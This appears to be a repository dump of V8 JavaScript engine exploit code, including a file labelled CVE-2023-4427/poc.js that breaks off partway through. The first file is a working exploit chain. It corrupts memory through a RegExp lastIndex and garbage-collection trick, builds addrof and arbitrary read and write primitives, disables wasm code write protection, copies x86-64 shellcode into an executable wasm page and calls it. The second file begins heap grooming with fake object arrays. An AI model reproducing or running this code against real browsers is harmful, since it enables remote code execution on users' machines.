| return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; 
i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | 83 | 84 | var helper = new Helpers(); 85 | 86 | var corrupted_array; 87 | var fake_object_array; 88 | 89 | var re = new RegExp('foo', 'g'); 90 | 91 | var match_object = {}; 92 | match_object[0] = { 93 | toString: function () { 94 | return ""; 95 | } 96 | }; 97 | 98 | re.exec = function () { 99 | helper.mark_sweep_gc(); 100 | delete re.exec; // transition back to initial regexp map 101 | re.lastIndex = 1073741823; // maximum smi, adding one will result in a HeapNumber 102 | new Array(256); // add space before NewHeapNumber 103 | RegExp.prototype.exec = function () { 104 | throw ''; // break out of Regexp.replace 105 | } 106 | return match_object; 107 | }; 108 | 109 | try { 110 | var newstr = re[Symbol.replace]("fooooo", ".$"); 111 | } catch (e) { } 112 | 113 | helper.scavenge_gc(); 114 | helper.mark_sweep_gc(); 115 | 116 | fake_object_array = [1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 
8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 
1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309]; 117 | 118 | var addrof_array = new Array(32); 119 | corrupted_array = re.lastIndex; 120 | 121 | // Adapt this with your own value to create a fake array object 122 | // print(helper.pair_i32_to_f64(0x00203b19, 0x2269)); 123 | // print(helper.pair_i32_to_f64(0x0343151, 0x60000)); 124 | var parent_array_addr = helper.ftoil(corrupted_array[0]); 125 | // print(helper.hex(parent_array_addr)); 126 | 127 | function addrof(obj) { 128 | addrof_array[0] = obj; 129 | return corrupted_array[5]; 130 | } 131 | 132 | function arbRead(where) { 133 | fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20); 134 | return corrupted_array[0]; 135 | } 136 | 137 | function arbWrite(where, what) { 138 | fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20); 139 | 
corrupted_array[0] = helper.i64tof64(what); 140 | } 141 | 142 | let mem = new ArrayBuffer(1024); 143 | let dv = new DataView(mem); 144 | 145 | let mem_addr = helper.ftoil(addrof(mem)); 146 | print("[+] mem addr:", helper.hex(mem_addr)) 147 | 148 | 149 | // remove wasm write protection, use your own offset 150 | let TARGET = { 151 | 'base': 0x7ff6, 152 | 'FLAG_write_protect_code_memory': 0xcde20b10, 153 | 'FLAG_wasm_memory_protection_keys': 0xcde20aa5, 154 | 'FLAG_wasm_write_protect_code_memory': 0xcde20aa4 155 | } 156 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_write_protect_code_memory'], TARGET['base']))); 157 | dv.setUint8(0, 0, true); 158 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_memory_protection_keys'], TARGET['base']))); 159 | dv.setUint8(0, 0, true); 160 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_write_protect_code_memory'], TARGET['base']))); 161 | dv.setUint8(0, 0, true); 162 | 163 | var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 164 | var wasmModule = new WebAssembly.Module(wasmCode); 165 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 166 | var f = wasmInstance.exports.main; 167 | 168 | fake_object_array[131] = helper.pair_i32_to_f64(0x0343151, 0x60000); 169 | let wasmInstance_addr = helper.ftoil(addrof(wasmInstance)); 170 | print("[+] mem addr:", helper.hex(wasmInstance_addr)); 171 | 172 | let rwx_page = helper.f64toi64(arbRead(wasmInstance_addr + 0x60)); 173 | print("[+] rwx_page addr:", helper.hex(rwx_page)); 174 | 175 | arbWrite(mem_addr + 0x1c, rwx_page); 176 | 
177 | let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195]; 178 | 179 | for (var i = 0; i < shellcode.length; i++) { 180 | dv.setUint8(i, shellcode[i], true); 181 | } 182 | 183 | corrupted_array = null; 184 | re.lastIndex = {}; 185 | 186 | f(); -------------------------------------------------------------------------------- /CVE-2023-4427/poc.js: -------------------------------------------------------------------------------- 1 | /* eslint-disable guard-for-in */ 2 | /* eslint-disable require-jsdoc */ 3 | class Helpers { 4 | constructor() { 5 | this.buf = new ArrayBuffer(8); 6 | this.dv = new DataView(this.buf); 7 | this.u8 = new Uint8Array(this.buf); 8 | this.u32 = new Uint32Array(this.buf); 9 | this.u64 = new BigUint64Array(this.buf); 10 | this.f32 = new Float32Array(this.buf); 11 | this.f64 = new Float64Array(this.buf); 12 | 13 | this.roots = new Array(0x30000); 14 | this.index = 0; 15 | } 16 | 17 | pair_i32_to_f64(p1, p2) { 18 | this.u32[0] = p1; 19 | this.u32[1] = p2; 20 | return this.f64[0]; 21 | } 22 | 23 | i64tof64(i) { 24 | this.u64[0] = i; 25 | return this.f64[0]; 26 | } 27 | 28 | f64toi64(f) { 
29 | this.f64[0] = f; 30 | return this.u64[0]; 31 | } 32 | 33 | set_i64(i) { 34 | this.u64[0] = i; 35 | } 36 | 37 | set_l(i) { 38 | this.u32[0] = i; 39 | } 40 | 41 | set_h(i) { 42 | this.u32[1] = i; 43 | } 44 | 45 | get_i64() { 46 | return this.u64[0]; 47 | } 48 | 49 | get_f64() { 50 | return this.f64[0]; 51 | } 52 | 53 | ftoil(f) { 54 | this.f64[0] = f; 55 | return this.u32[0]; 56 | } 57 | 58 | ftoih(f) { 59 | this.f64[0] = f; 60 | return this.u32[1]; 61 | } 62 | 63 | add_ref(object) { 64 | this.roots[this.index++] = object; 65 | } 66 | 67 | mark_sweep_gc() { 68 | new ArrayBuffer(0x7fe00000); 69 | } 70 | 71 | scavenge_gc() { 72 | for (let i = 0; i < 8; i++) { 73 | // fill up new space external backing store bytes 74 | this.add_ref(new ArrayBuffer(0x200000)); 75 | } 76 | this.add_ref(new ArrayBuffer(8)); 77 | } 78 | 79 | hex(i) { 80 | return i.toString(16).padStart(16, "0"); 81 | } 82 | 83 | breakpoint() { 84 | this.buf.slice(); 85 | } 86 | } 87 | function sleep(ms) { 88 | return new Promise((resolve) => setTimeout(resolve, ms)); 89 | } 90 | function hang() { 91 | while (1) {} 92 | } 93 | 94 | function pwn() { 95 | const helper = new Helpers(); 96 | 97 | // =================== // 98 | // Start here! 
// 99 | // =================== // 100 | helper.scavenge_gc(); 101 | 102 | helper.mark_sweep_gc(); 103 | helper.mark_sweep_gc(); 104 | // 00042129 105 | 106 | driver_array = [ 107 | 3.69439535138165225921828113275e-311, 1.11253692977586019346629363689e-308, 108 | 3.3, 4.4, 109 | ]; 110 | const float_array = [1.1, 2.2, 3.3, 4.4]; 111 | const obj_array = [{}, {}, {}, {}]; 112 | 113 | const object1 = {}; 114 | object1.a = 1; 115 | const object2 = {}; 116 | object2.a = 1; 117 | object2.b = 1; 118 | const object3 = {}; 119 | object3.a = 1; 120 | object3.b = 1; 121 | object3.c = 1; 122 | for (const key in object2) { 123 | } 124 | 125 | // %DebugPrint(driver_array); 126 | // %SystemBreak(); 127 | fake_object_array = [ 128 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 129 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 130 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 131 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 132 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 133 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 134 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 135 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 136 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 137 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 138 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 139 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 140 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 141 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 142 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 143 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
144 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 145 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 146 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 147 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 148 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 149 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 150 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 151 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 152 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 153 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 154 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 155 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 156 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 157 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 158 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 159 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 160 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 161 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 162 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 163 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 164 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 165 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 166 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 167 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 168 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
169 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 170 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 171 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 172 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 173 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 174 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 175 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 176 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 177 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 178 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 179 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 180 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 181 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 182 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 183 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 184 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 185 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 186 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 187 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 188 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 189 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 190 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 191 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 192 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 193 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
194 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 195 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 196 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 197 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 198 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 199 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 200 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 201 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 202 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 203 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 204 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 205 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 206 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 207 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 208 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 209 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 210 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 211 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 212 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 213 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 214 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 215 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 216 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 217 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 218 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
219 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 220 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 221 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 222 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 223 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 224 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 225 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 226 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 227 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 228 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 229 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 230 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 231 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 232 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 233 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 234 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 235 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 236 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 237 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 238 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 239 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 240 | 2.2431044572652967563980781402e-308, 